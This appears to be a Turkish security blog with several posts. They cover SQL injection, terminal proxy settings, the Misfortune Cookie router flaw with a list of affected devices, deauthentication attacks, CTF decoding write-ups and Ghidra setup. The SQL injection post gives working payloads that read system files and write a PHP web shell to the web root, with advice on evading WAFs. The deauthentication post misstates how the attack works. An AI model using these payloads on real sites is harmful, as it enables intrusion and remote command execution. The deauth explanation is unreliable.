12 Şubat 2021 Cuma

SQL INJECTION TO RCE & LFI


Bu makalemde sizlere SQLI TO RCE ve SQLI TO LFI konularına değineceğim. Konuyu olabildiğince kısa ve açıklayıcı yazmaya özen gösterdim umarım yardımı dokunur.

Genelde pentestlerde SQL Injection bulunduğu zaman pentester arkadaşımız direk admin panel bilgilerini elde edip yönetim panelinde web shell yükleyebileceği bir file upload açığı arar ancak kimi zaman admin panelin pathini bulamaz kimi zaman zararlısını upload edebileceği biryer. Bu gibi durumlarda yardımımıza  MySQL'in LOAD_FILE() ve INTO_OUTFILE() fonksiyonları yetişiyor.

Peki Nedir Hocam Bunlar?

LOAD_FILE() fonksiyonu bir dosyayı okumamıza yarar yani size bir tüyo SQLI to LFI'ı bu fonksiyon sayesinde  yapacağız demek oluyor bu. INTO_OUTFILE() fonksiyonu ise bizim verdiğimiz metni bir dosyaya yazmamıza yarar bunun sayesinde de web shell imizi atacağız.

Let's Do It !!

Web Shell atmayı göstermeden önce LOAD_FILE() ile dosya okumayı göstereyim bu fonksiyon ile dosya okumak için okunacak dosyamızın herkes tarafından okunabillir olması lazım. hemen bir örnekle göstereyim.

Örnek Payload:

http://www.0xp0lyx4.blogspot.com/index.php?id=1 UNION SELECT 1,LOAD_FİLE('etc/passwd'),3,4,5,6,7-- -
bu payload ile eğer etc/passwd dosyasında herkese okuma izni açık ise başarılı bir şekilde okumuş olduk. Tabiki okuyabileceğimiz dosyalar sadece passwd ile sınırlı değil mesela web uygulamalarının config dosyaları gibi kritik dosyaları okuyarak önemli bilgiler elde edebilirsiniz.

Şimdi sırada LOAD_OUTFİLE fonksiyonu ile webshell atmak var. Web Shellimizi atacağımız yerdeki izinlerimizi kontrol etmekle başlayabiliriz. Bunun için birçok yöntem var ancak biz biri ile başlyalım .

Örnek Payloadlar:

http://www.0xp0lyx4.blogspot.com/index.php?id=1' AND MID((SELECT is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%0xp0lyx4%'),1,1)='Y
http://www.0xp0lyx4.blogspot.com/index.php?id=1' UNION SELECT grantee,is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee  like '%0xp0lyx4%
http://www.0xp0lyx4.blogspot.com/index.php?id=1' AND MID((SELECT file_priv FROM mysql.user WHERE user = '0xp0lyx4'),1,1) = 'Y'
Eğer herhangi bir sebepten yukarıdaki gibi yapamıyorsanız biraz daha uğraştırıcı bir yol denemek durumunda kalıyorsunuz, dosyalara yazmayı elle deneme yanılma yoluyla denemek.

http://www.0xp0lyx4.blogspot.com/index.php?id=1′ UNION SELECT 1,2,3, '<?php system($_GET['cmd']) ?>' ,5,6,7,8 INTO OUTFİLE '/var/www/webshell.php'-- -
Yukarıdaki gibi webshell.php yi oluşturmuş olduk. bu da SQLI to RCE ye bir örnektir. Tabiki her sitede direk bu payloadları kopyala yapıştır yapmak işe yarıyacak diye birşey yok WAF(Web Application Firewall) olan sitelerde WAF Bypasslamak için payloadı siteye göre özelleştirmeniz gerekecektir.

Umarım makalemin size yardımı dokunmuştur sonuna kadar okuduğunuz için teşekkür ederim. Bir sonraki makaleme kadar Hoşçakalın :)

8 Şubat 2021 Pazartesi

LINUX TERMINALDE PROXY KULLANMA

 

LINUX TERMINALDE PROXY KULLANMA


Selam, bugun sizlere kurumsal ağları kullanan dostlarım için GUI erişimi olmadığı zamanlarda kolay bir şekilde linux terminalinden HTTP Proxy, HTTPS Proxy ve FTP Proxy kullanmayı göstereceğim.

Ilk önce Terminalde HTTP Proxy kullanmayı göstereyim:

$ export http_proxy="http://PROXY_SUNUCUSU:PORT"
Şimdide HTTPS Proxy Kullanımının komutunu veriyim:

$ export https_proxy="https://PROXY_SUNUCUSU:PORT"
Son Olarak FTP Proxy ye bağlanmanın komutunu veriyim:

$ export ftp_proxy="http://PROXY_SUNUCUSU:PORT"
Evet 3 ünü de verdik lakin bazı proxylere bağlanmak için kullanıcı adı ve parola gerekebiliyor bu durumda aşağıdaki gibi bağlanabilirsiniz.

$ export http_proxy="http://KULLANICI_ADI:SİFRE@PROXY_SUNUCUSU:PORT"
$ export https_proxy="https://KULLANICI_ADI:SİFRE@PROXY_SUNUCUSU:PORT"
$ export ftp_proxy="http://KULLANICI_ADI:SİFRE@PROXY_SUNUCUSU:PORT"

26 Aralık 2020 Cumartesi

Misfortune Cookie (CVE-2014-9222) NEDIR?


Selam Bugün sizlere 12 Milyon Adsl Modem, Kablo Modem,Kablosuz Router,Switch Kablosuz Acces Pointleri etkilemiş olan oldukça kritik bir güvenlik açığından bahsedecem.Bu Zafiyetrouterlarda web arayüzü sunmak için kullanılan Allegro Rompager adlı gömülü web server uygulamasında bulunuyor. Bu zafiyetten yararlanılarak saldırgan heçkırlar modem arayüzünüze hiçbir şifre vb girmeden login olabiliyor. Saldırgan heçkır router arayüzünüze giriş yaptıktan sonra dilediğini gerçekleştirebiliyor zaten isterse modem şifrenizi değiştirir isterse başka şey yapar bu yüzden çok kritik önem taşır.

Peki Nasıl Korunuruz Hocam?

Şimdi bak kanka korunmak çok basit zaten bunun 2 tane yolu var:

  • Eğer cihazında firmware güncellemesi varsa cihaz üreticisinin sitesinden yüklemek.
  •  Yoksa da çözüm çok basit yeni bir cihaz satın al bu kadar basit kanka 😂

  • Cihazımda Misfortune Cookie Varmı?
    Cihazınızın yazının en altında verdiğim açıklı cihazlar listesinde olup olmadığını kontrol edebilirsiniz.

    Saldırı Videosu:

    Açıklı Cihazlar Listesi:
    • 110TC2 Beetel
    • 16NX073012001 Nilox
    • 16NX080112001 Nilox
    • 16NX080112002 Nilox
    • 16NX081412001 Nilox
    • 16NX081812001 Nilox
    • 410TC1 Beetel
    • 450TC1 Beetel
    • 450TC2 Beetel
    • 480TC1 Beetel
    • AAM6000EV/Z2 ASUS
    • AAM6010EV ASUS
    • AAM6010EV/Z2 ASUS
    • AAM6010EV-Z2 ASUS
    • AAM6020BI ASUS
    • AAM6020BI-Z2 ASUS
    • AAM6020VI/Z2 ASUS
    • AD3000W starnet
    • ADSL Modem Unknown
    • ADSL Modem/Router Unknown
    • ADSL Router BSNL
    • AirLive ARM201 AirLive
    • AirLive ARM-204 AirLive
    • AirLive ARM-204 Annex A AirLive
    • AirLive ARM-204 Annex B AirLive
    • AirLive WT-2000ARM AirLive
    • AirLive WT-2000ARM Annex A AirLive
    • AirLive WT-2000ARM Annex B AirLive
    • AMG1001-T10A ZyXEL
    • APPADSL2+ Approx
    • APPADSL2V1 Approx
    • AR-7182WnA Edimax
    • AR-7182WnB Edimax
    • AR-7186WnA/B Edimax
    • AR-7286WNA Edimax
    • AR-7286WnB Edimax
    • Arcor-DSL WLAN-Modem 100 Arcor
    • Arcor-DSL WLAN-Modem 200 Arcor
    • AZ-D140W Azmoon
    • Billion Sky Billion
    • BiPAC 5102C Billion
    • BiPAC 5102S Billion
    • BiPAC 5200S Billion
    • BIPAC-5100 ADSL Router Billion
    • BLR-TX4L Buffalo
    • BW554 SBS
    • C300APRA2+ Conceptronic
    • Compact Router ADSL2+ Compact
    • D-5546 den-it
    • D-7704G den-it
    • Delsa Telecommunication Delsa
    • D-Link_DSL-2730R D-Link
    • DM 856W Binatone
    • DSL-2110W D-Link
    • DSL-2120 D-Link
    • DSL-2140 D-Link
    • DSL-2140W D-Link
    • DSL-2520U D-Link
    • DSL-2520U_Z2 D-Link
    • DSL-2600U D-Link
    • DSL-2640R D-Link
    • DSL-2641R D-Link
    • DSL-2680 D-Link
    • DSL-2740R D-Link
    • DSL-320B D-Link
    • DSL-321B D-Link
    • DSL-3680 D-Link
    • DT 815 Binatone
    • DT 820 Binatone
    • DT 845W Binatone
    • DT 850W Binatone
    • DWR-TC14 ADSL Modem Unknown
    • EchoLife HG520s Huawei
    • EchoLife Home Gateway Huawei
    • EchoLife Portal de Inicio Huawei
    • GO-DSL-N151 D-Link
    • HB-150N Hexabyte
    • HB-ADSL-150N Hexabyte
    • Hexabyte ADSL Hexabyte
    • Home Gateway Huawei
    • iB-LR6111A iBall
    • iB-WR6111A iBall
    • iB-WR7011A iBall
    • iB-WRA150N iBall
    • iB-WRA300N iBall
    • iB-WRA300N3G iBall
    • IES1248-51 ZyXEL
    • KN.3N Kraun
    • KN.4N Kraun
    • KR.KQ Kraun
    • KR.KS Kraun
    • KR.XL Kraun
    • KR.XM Kraun
    • KR.XM\t Kraun
    • KR.YL Kraun
    • Linksys BEFDSR41W Linksys
    • LW-WAR2 LightWave
    • M-101A ZTE
    • M-101B ZTE
    • M-200 A ZTE
    • M-200 B ZTE
    • MN-WR542T Mercury
    • MS8-8817 SendTel
    • MT800u-T ADSL Router BSNL
    • MT880r-T ADSL Router BSNL
    • MT882r-T ADSL Router BSNL
    • MT886 SmartAX
    • mtnlbroadband MTNL
    • NetBox NX2-R150 Nilox
    • Netcomm NB14 Netcomm
    • Netcomm NB14Wn Netcomm
    • NP-BBRsx Iodata
    • OMNI ADSL LAN EE(Annex A) ZyXEL
    • P202H DSS1 ZyXEL
    • P653HWI-11 ZyXEL
    • P653HWI-13 ZyXEL
    • P-660H-D1 ZyXEL
    • P-660H-T1 v3s ZyXEL
    • P-660H-T3 v3s ZyXEL
    • P-660HW-D1 ZyXEL
    • P-660R-D1 ZyXEL
    • P-660R-T1 ZyXEL
    • P-660R-T1 v3 ZyXEL
    • P-660R-T1 v3s ZyXEL
    • P-660R-T3 v3 ZyXEL
    • P-660R-T3 v3s ZyXEL
    • P-660RU-T1 ZyXEL
    • P-660RU-T1 v3 ZyXEL
    • P-660RU-T1 v3s ZyXEL
    • P-660RU-T3 v3s ZyXEL
    • PA-R11T Solwise
    • PA-W40T-54G PreWare
    • Cerberus P 6311-072 Pentagram
    • PL-DSL1 PreWare
    • PN-54WADSL2 ProNet
    • PN-ADSL101E ProNet
    • Portal de Inicio Huawei
    • POSTEF-8840 Postef
    • POSTEF-8880 Postef
    • Prestige 623ME-T1 ZyXEL
    • Prestige 623ME-T3 ZyXEL
    • Prestige 623R-A1 ZyXEL
    • Prestige 623R-T1 ZyXEL
    • Prestige 623R-T3 ZyXEL
    • Prestige 645 ZyXEL
    • Prestige 645R-A1 ZyXEL
    • Prestige 650 ZyXEL
    • Prestige 650H/HW-31 ZyXEL
    • Prestige 650H/HW-33 ZyXEL
    • Prestige 650H-17 ZyXEL
    • Prestige 650H-E1 ZyXEL
    • Prestige 650H-E3 ZyXEL
    • Prestige 650H-E7 ZyXEL
    • Prestige 650HW-11 ZyXEL
    • Prestige 650HW-13 ZyXEL
    • Prestige 650HW-31 ZyXEL
    • Prestige 650HW-33 ZyXEL
    • Prestige 650HW-37 ZyXEL
    • Prestige 650R-11 ZyXEL
    • Prestige 650R-13 ZyXEL
    • Prestige 650R-31 ZyXEL
    • Prestige 650R-33 ZyXEL
    • Prestige 650R-E1 ZyXEL
    • Prestige 650R-E3 ZyXEL
    • Prestige 650R-T3 ZyXEL
    • Prestige 652H/HW-31 ZyXEL
    • Prestige 652H/HW-33 ZyXEL
    • Prestige 652H/HW-37 ZyXEL
    • Prestige 652R-11 ZyXEL
    • Prestige 652R-13 ZyXEL
    • Prestige 660H-61 ZyXEL
    • Prestige 660HW-61 ZyXEL
    • Prestige 660HW-67 ZyXEL
    • Prestige 660R-61 ZyXEL
    • Prestige 660R-61C ZyXEL
    • Prestige 660R-63 ZyXEL
    • Prestige 660R-63/67 ZyXEL
    • Prestige 791R ZyXEL
    • Prestige 792H ZyXEL
    • RAWRB1001 Reconnect
    • RE033 Roteador
    • RTA7020 Router Maxnet
    • RWS54 Connectionnc
    • SG-1250 Everest
    • SG-1500 Everest
    • SmartAX SmartAX
    • SmartAX MT880 SmartAX
    • SmartAX MT882 SmartAX
    • SmartAX MT882r-T SmartAX
    • SmartAX MT882u SmartAX
    • Sterlite Router Sterlite
    • Sweex MO300 Sweex
    • T514 Twister
    • TD811 TP-Link
    • TD821 TP-Link
    • TD841 TP-Link
    • TD854W TP-Link
    • TD-8616 TP-Link
    • TD-8811 TP-Link
    • TD-8816 TP-Link
    • TD-8816 1.0 TP-Link
    • TD-8816 2.0 TP-Link
    • TD-8816B TP-Link
    • TD-8817 TP-Link
    • TD-8817 1.0 TP-Link
    • TD-8817 2.0 TP-Link
    • TD-8817B TP-Link
    • TD-8820 TP-Link
    • TD-8820 1.0 TP-Link
    • TD-8840T TP-Link
    • TD-8840T 2.0 TP-Link
    • TD-8840TB TP-Link
    • TD-W8101G TP-Link
    • TD-W8151N TP-Link
    • TD-W8901G TP-Link
    • TD-W8901G 3.0 TP-Link
    • TD-W8901GB TP-Link
    • TD-W8901N TP-Link
    • TD-W8951NB TP-Link
    • TD-W8951ND TP-Link
    • TD-W8961N TP-Link
    • TD-W8961NB TP-Link
    • TD-W8961ND TP-Link
    • T-KD318-W MTNL
    • TrendChip ADSL Router BSNL
    • UM-A+ Asotel
    • Vodafone ADSL Router BSNL
    • vx811r CentreCOM
    • WA3002-g1 BSNL
    • WA3002G4 BSNL
    • WA3002-g4 BSNL
    • WBR-3601 LevelOne
    • WebShare 111 WN Atlantis
    • WebShare 141 WN Atlantis
    • WebShare 141 WN+ Atlantis
    • Wireless ADSL Modem/Router Unknown
    • Wireless-N 150Mbps ADSL
    • Router BSNL
    • ZXDSL 831CII ZTE
    • ZXDSL 831II ZTE
    • ZXHN H108L ZTE
    • ZXV10 W300 ZTE
    • ZXV10 W300B ZTE
    • ZXV10 W300D ZTE
    • ZXV10 W300E ZTE
    • ZXV10 W300S ZTE
    Referanslar:

    15 Aralık 2020 Salı

    Deauthentication Saldırıları ve Korunma Yöntemleri (Yüzeysel)

    Deauthentication Saldırısı Nedir?

    Deauthentication Saldırısı kablosuz ağlarda bir Acces Point'e bağlı olan client/clientlere  sürekli deauthentication frameler göndererek cihazın bağlantısını koparmayı amaçlayan saldırı çeşididir. Çalışma mantığı DOS (Denial Of Service) Saldırıları ile aynıdır.


    Yukarıda gördüğünüz üzere Client sürekli Authentication Requestleri yolluyarak sürekli Assocition Responseler alıyor bu sayede AP yi meşgul edip giden diğer requestleri cevaplayamamasını sağlıyor.

    Deauthentication Saldıralarından Korunma:

    Deauthentication saldıralardan korunmak için bir Session Manager (Oturum Yönetim Sistemi) kullanmanız gerekir.


    Bu yazımda sizlere yüzeysel olarak Deauthentication Saldırısına değindim fazla detaylı yazmak istemedim çünkü zaten bu konuda internette birsürü kaynak var. Detaylı şekilde bu konuyu araştırmanızı tavsiye ederim ve aşağıya bıraktığım referanslar size yardımcı olacaktır bir sonraki yazımda görüşmek üzere. 😀
    Referanslar:

    https://www.cisco.com/c/en/us/td/docs/wireless/controller/7-4/configuration/guides/consolidated/b_cg74_CONSOLIDATED/b_cg74_CONSOLIDATED_chapter_010110100.html
    https://arxiv.org/abs/1901.07301
    https://mrncciew.com/2014/10/11/802-11-mgmt-deauth-disassociation-frames/

    20 Kasım 2020 Cuma

    BATTLEWARE CTF WRITE-UP OSINT #1



    Selam, CTF bize bir waw dosyası vermiş ve açınca bu dosyanın mors alfabesi olduğunu anlamak çok uzun sürmüyor. Aşağıda verdiğim siteye girip ses dosyasını mors kodlarına çevirebiliriz.

    Bazen bize mors kodu olmayan karakterlerinde olduğu bir sonuç verebiliyor. Bende bu yüzden yarışmada kodu çeviremeyip flagi bulamadım ama birkaç kez yaptıktan sonra size aşağıdaki gibi bir mors kodu verecektir.


    -. --.- --.. .-- --- -- ...-- - -- -- --.- ..--- -.-. ....- -.-- - -... --- .-. ..--- --. -.-- --.. .-.. -..- -- ..-. --.. --. -.- .-.. - ..--- -. ..... -..- --. -.- -...- -. ..- -...- 

    Mors kodunu aşağıda verdiğim siteden text haline çeviriyoruz.

    https://morsecode.world/international/translator.html


    Çıktı:

    NQZWOM3TMMQ2C4YTBOR2GYZLXMFZGKLT2N5XGKNU

    Şimdide Base32 decode edip flagimize ulaşalım.Aşağıda verdiğim siteden decode edebilirsiniz.

    https://simplycalc.com/base32-decode.php



    l3g3nd4.battleware.z

    buraya kadar geldik lakin yarışma bittiği için devamını malesef anlatamayacağım. Bir sonraki ctf lerde video alıp write-up yazarken kullanmayı düşünüyorum.

    BATTLEWARE CTF WRITE-UP CRYPTOLOGY Br34k1.txt #1



    Selam, Battleware ye ekip arkadaşımla beraber katıldım flagleri girememiş olsakda çoğunda flagi bulmaya yaklaştık. Bu haftaki sorular ne çok zor ne çok kolaydı tam olması gereken gibiydi bence.

    İlk önce dosyamızı indirelim ve açalım.

    Br34k1.txt:

    eGlBPCx7Sk5uJFsreXYyZjB8WUxNOl97cCNPZE9CSEp3S3p6Qz9qRyhNcCFYW010

    açtığımızda karşımıza bu şekilde bir şifrelenmiş bir metin çıkıyor.Online araçları kullanarak şifrelendiği algoritmayı bulalım.

    https://hashes.com/en/tools/hash_identifier

    Aşağıdaki siteden sorguladığımda Base64 olabileceğini söylüyor. Hemen Base64 Decoderlerden birinde decode edelim.
    Decode edilmiş metin:
    xiA<,{JNn$[+yv2f0|YLM:_{p#OdOBHJwKzzC?jG(Mp!X[Mt

    Şimdide Vigenere ile decode edelim. Decode ettiğim siteyi aşağıda verdim.

    https://cryptii.com/pipes/vigenere-cipher

    Key i tahmin etmemiz gerekiyor deneyerek key in battleware olduğunu bulduk ve decode ettik. Şimdide son olarak base91 decode edelim.



    ve flagimizi bulmuş olduk.


    Flag{c0ngr4ts!_this_is_th3_crypt0_fl4g}

    3 Kasım 2020 Salı

    GHIDRA İLE TERSINE MÜHENDISLIK REHBER #2



     Selamlar Ben 0xp0lyx4 Bir Önceki makalemde GHidra Serisi Başlatmıştım bu makalemdede GHidrada bir PE dosyasını analiz için uygun hale getirmeyi göstereceğim.

    GHidranın Kurulumunu Tamamlayıp Çalıştırdığımızda Karşımıza Böyle Bir Ekran Gelecektir.



    Bu Sayfayla beraber "Tip of the Day" ve proje oluşturma sayfasıda geliyor.


    Şimdi Bir Proje Oluşturalım. Ilk once sol usttekı File bölümünden New Project i Seçelim.



    Karşımıza Böyle Bir Bölüm Çıkacak Burada Bize Oluşturacağımız Projeyi paylaşılabilir yapmak isteyip istemediğimizi soruyor ben paylaşılabilir olmasın yani Non-Shared Project i seçip Next Butonuna Basıyorum.


    Buradan Project Directory Kısmından  Projemizin Olmasını İstediğimiz Path i yazıyoruz. Project Name yazan kısımda zaten adı üstünde proje ismini yazıyoruz ve Finish e basıyoruz.


    Buraya kadar herşeyi doğru yaptıysanız projeniz oluşmuş demektir. Buradan Sonra "Tool Chest" bölümünden Yeşil Gafalı Ejderya Arkadaşı Seçiyoruz ve Code Browserimizi açmış oluyoruz.



    Buradan da File den "Import File" a basıyoruz ve analiz etmek istediğimiz dosyayı seçiyoruz.



    Burada dosya özelliklerini görüyoruz istersek kendimizde ayarlayabiliriz. Biz OK'a basıyoruz.


    (Niye sansürledin mık demeyin programın hash leri bilgisayarımdaki path i falan var öğrensenizde birşey olmazda bilmeyin, fbi dosyası karşim)

    Bizi Böyle Bir Pencere karşıladı burada bize seçtiğimiz dosyanın analizinin yapılmadığını ve şuan analizini yapmak istermisin diye soruyor, Yes i seçip OK a basıyoruz.



    Görüldüğü Üzere Code Browserimizdde dosyamız açıldı. Birdahaki yazılarımda detaylıca kullanımını anlatacam ve ileride GHidra ile analizler, kıreklemeler falan yapıcaz takipte kalın.

    2 Kasım 2020 Pazartesi

    GHidra İle Tersine Mühendislik Rehber Nedir Aga Bu GHidra #1


    Selam Ben 0xp0lyx4 Blogumun İlk makalesine Hoşgeldiniz. Bu makalede Sizlere Ghidra Aracından Bahsedeceğim Hoşunuza Giderse İstekleriniz Üzere Bunu Bir Seri Haline Getirmek İsterim. Yazıya Başlamadan Önce Kendisini Severek Aktif Bir Şekilde Kullandığım Yenilikçi Ve Pek Çok İşimi Kolaylaştıran Güzel Bir Araç Olduğunuda Belirtmekte Fayda Var.

    GHidra Nedir?

    Generic
    Hexedecimal
    Integrated
    Decompiling
    Reverse-Engineering
    Architecture

    GHidra NSA nın Araştırma Bölümü Tarafından Java Dili İle Geliştirilen Tersine Mühendislik Aracıdır. GHidra Kullanarak Windows, Linux Ve Mac Os İşletim Sistemlerinde Derlenmiş Kodları Analiz Etmenize Yardımcı Olan Bir Araçtır. Kullanıcılar GHidra Eklentilerini Python Ve Java Dili İle Geliştirebilmesine Olanak Sağlar.

    Hangi İşlemci Mimarilerini Destekler?

    X86 16/32/64, ARM / AARCH64, PowerPC 32/64 / VLE, MIPS 16/32/64 / mikro, 68xxx, Java / DEX bayt kodu, PA-RISC, PIC 12/16/17/18/24, Sparc 32/64, CR16C, Z80, 6502, 8051, MSP430, AVR8, AVR32 ve Çeşitleri.

    GHidra İndirme Linki: